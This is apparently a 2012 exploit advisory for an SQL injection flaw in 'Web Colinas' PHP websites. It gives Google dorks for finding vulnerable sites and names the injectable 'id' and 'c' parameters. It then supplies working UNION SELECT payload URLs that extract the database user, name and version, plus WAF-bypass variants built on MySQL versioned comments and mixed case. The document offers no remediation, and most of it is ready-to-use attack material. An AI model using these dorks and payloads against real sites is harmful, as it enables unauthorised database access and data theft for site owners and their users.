# '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # Web Colinas Sql Injection Vulnerability # Google Dork(1): intext:"Web Colinas" inurl:".php?id=" # Google Dork(2): intext:"Web Colinas" inurl:".php?c=" # Date: 16/11/2012 # Author: Sys32 # Email: tha.Sys32[at]gmail[dot]com # Vendor: http://www.webcolinas.pt/ # Category: Webapp # Tested on: Backtrack 5 r3 # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # I. INFO. # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # The application is vulnerable to sql injection, allowing an attacker to gain full access to the database. # Some injections need WAF bypass # # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # II. EXPLOIT. # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # http://127.0.0.1/vull-page.php?id=[Sql-Injection] # # http://127.0.0.1/Vull-page.php?c=[Sql-Injection] # # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # III. EXPLOIT Example. # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # Injection: # # http://127.0.0.1/Vull-page.php?c=-3 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4-- # # http://127.0.0.1/vull-page.php?id=-3 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4-- # # Injection + WAF Bypass: # # http://127.0.0.1/Vull-page.php?id=-3/*!20000union*/+/*!20000SelEct*/ 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4-- # # http://127.0.0.1/Vull-page.php?c=-3/*!20000union*/+/*!20000SelEct*/ 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4-- # # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # IV. Risk. # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # The security risk of the remote sql injection vulnerability is estimated as critical. # ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''